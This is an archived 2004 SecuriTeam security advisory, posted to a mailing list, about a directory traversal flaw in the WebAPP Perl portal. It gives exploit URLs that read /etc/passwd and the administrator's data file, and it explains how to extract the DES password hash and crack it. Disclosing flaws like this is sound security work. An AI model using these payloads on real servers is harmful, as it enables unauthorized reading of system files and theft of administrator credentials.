Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[UNIX] WebAPP Directory Traversal and Encrypted DES Disclosure

Subject: [UNIX] WebAPP Directory Traversal and Encrypted DES Disclosure
Date: 31 Aug 2004 18:52:02 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  WebAPP Directory Traversal and Encrypted DES Disclosure
------------------------------------------------------------------------


SUMMARY

 <http://www.web-app.org/> WebAPP is "Internet's most feature rich, easy 
to run PERL based portal system".

WebAPP suffers from a directory traversal vulnerability in its view 
category module, allowing a remote attacker to compromise sensitive files 
stored in the server as well as WebAPP administrator's DES encrypted 
password.

DETAILS

Exploit:
1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi

2) Click on Articles on the main menu at the left side of the screen

3) Click on any of the icons representing the miscellaneous topics 
available

4) You'll wind up with the URL 
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs 
on the address bar on your browser. Change it to 
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00

5) View the HTML source for the page

A more interesting file to look at would be: 
http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00

View the HTML source code and scroll down until you come to the line with: 
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"

"adUCOOzV2ljgg" is the hashed password of the Administrator. It's standard 
DES encrypted so you can run a password-cracking program to crack it.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:jerome.athias@caramail.com> 
JXrXme ATHIAS.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] WebAPP Directory Traversal and Encrypted DES Disclosure, SecuriTeam <=